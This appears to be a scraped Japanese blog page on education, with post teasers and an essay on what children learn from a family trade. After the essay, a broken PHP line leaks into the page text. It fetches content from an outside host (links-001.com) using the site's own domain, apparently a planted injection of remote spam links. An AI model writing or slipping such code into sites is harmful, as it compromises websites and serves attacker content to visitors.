前へ
次へ

梅雨時期ならではの教育法がある

ジメジメする梅雨の時期、活発に活動する子どもたちの場合の教育はどのように進められるのでしょうか。室内

more

勉強は一生涯続ける事が理想です

生涯教育が唱えられるようになって久しいですが、私も何か勉強を始めようと思っています。子供の頃は勉強が

more

教育はある意味では公共事業のようなもの

教育は最終的には人間を自然との共存の下でさらに文化や知能を高めるということを目的に行われるものである

more

家業から学べることも昔は多かった

教育の一つとして生業から得られるものというのがあります。今でこそそんなに使われる言葉ではないですが昔は家が一つの職業の塊であったということになり、家業という言葉があるように、家自体が職業を持っているというようなことがありました。そして、子どもたちはそこで学ぶことになります。生業から様々なことを学ぶということになるわけですがその技術そのものというのもあるのですが例えば上下関係であったり、どのような言葉遣いをするべきであるのかとか、人間関係での距離感の掴み方とかそうしたこともあったりするわけです。これも生活における教育のやり方ということになるわけです。家業から得られるということは色々とあるわけです。とくに子どものときには親の仕事を手伝うということによって学べることは一杯あります。何も学校からでしか学ぶことができないというわけではなく、普段の生活とか家の仕事で得られる知識や見識というのはあるわけです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top